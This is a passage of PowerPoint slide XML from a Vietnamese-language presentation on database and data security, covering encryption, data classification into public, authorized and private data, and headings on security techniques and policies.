                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> trước khi đến cơ sở dữ liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="26035" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="25"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Dữ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>liệu trong cơ sở dữ liệu có thể được mã hóa và ngay cả trong trường hợp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>xâm nhập, kẻ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tấn công không thể sử dụng dữ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>liệu đó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="26035" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="25"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3269EF9-D048-6246-16D1-8A89F4779294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="2740628"/>
            <a:ext cx="10177264" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3 Lựa chọn các kỹ thuật trong bảo mật dữ liệu đầu vào</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D1F911C-5081-56CF-17CD-CED55C89A48C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9163051" y="3478522"/>
            <a:ext cx="7981948" cy="3531288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="26035" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="25"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Dữ liệu có thể được chia thành </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>công khai, phân loại </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>được ủy quyền</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>và </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>riêng tư. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="26035" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="25"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ví dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kế toán viên có thể xem dữ liệu bảng lương cho tất cả nhân viên) và dữ liệu riêng tư chỉ có thể được truy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>bởi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>người dùng đã </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>chèn nó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5ABBAA8-FB6F-21CB-FF8C-BFDA5DC207BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8991600" y="3367766"/>
            <a:ext cx="0" cy="5509534"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="22" presetClass="entr" presetSubtype="4"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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="23" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="with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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="2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2" grpId="0"/>
      <p:bldP spid="16" grpId="0"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="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382232-BEA1-000B-0E1A-BCE53413F9C1}"/>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31ABDBE1-7849-C71E-B022-C036B39BCF2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-8376890">
            <a:off x="-4899893" y="6122938"/>
            <a:ext cx="11422613" cy="8328123"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11422613" h="8328123">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11422613" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11422613" y="8328124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="832812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1" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8744BFD1-C2E1-D5F0-1FAE-E74C2CCD59B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760920" y="876300"/>
            <a:ext cx="15544799" cy="1647887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="none" spc="-84">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>II. Tìm hiểu về thực trạng và các công việc liên quan đến bảo mật hiện nay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57633644-05AE-F758-5715-8FCC2B0243B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="2730270"/>
            <a:ext cx="16802100" cy="7442430"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70556116-A017-23AC-3C61-83D667F0A3F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40798" y="71151"/>
              <a:ext cx="3271246" cy="2164112"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3271246" h="2164112">
                  <a:moveTo>
                    <a:pt x="57855" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3213391" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3228735" y="0"/>
                    <a:pt x="3243451" y="6095"/>
                    <a:pt x="3254301" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3265150" y="27795"/>
                    <a:pt x="3271246" y="42511"/>
                    <a:pt x="3271246" y="57855"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3271246" y="2106257"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3271246" y="2121601"/>
                    <a:pt x="3265150" y="2136317"/>
                    <a:pt x="3254301" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3243451" y="2158016"/>
                    <a:pt x="3228735" y="2164112"/>
                    <a:pt x="3213391" y="2164112"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57855" y="2164112"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42511" y="2164112"/>
                    <a:pt x="27795" y="2158016"/>
                    <a:pt x="16945" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6095" y="2136317"/>
                    <a:pt x="0" y="2121601"/>
                    <a:pt x="0" y="2106257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="57855"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="42511"/>
                    <a:pt x="6095" y="27795"/>
                    <a:pt x="16945" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27795" y="6095"/>
                    <a:pt x="42511" y="0"/>
                    <a:pt x="57855" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED1BA458-8772-2DBE-E547-07AED6D4D06E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="71151"/>
              <a:ext cx="1950879" cy="334605"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="vi-VN" sz="3200" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>2.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3200" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3200" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t> Cài đặt các chính sách bảo mật và xây dựng mô hình</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Malgun Gothic" panose="020B0503020000020004" pitchFamily="34" charset="-127"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAC0BB1E-3517-3A12-40A8-E5521D4A8767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10458741" y="3450420"/>
            <a:ext cx="6438898" cy="6111498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01B4FE3E-1914-17C0-D497-BA9A4DD9AD12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
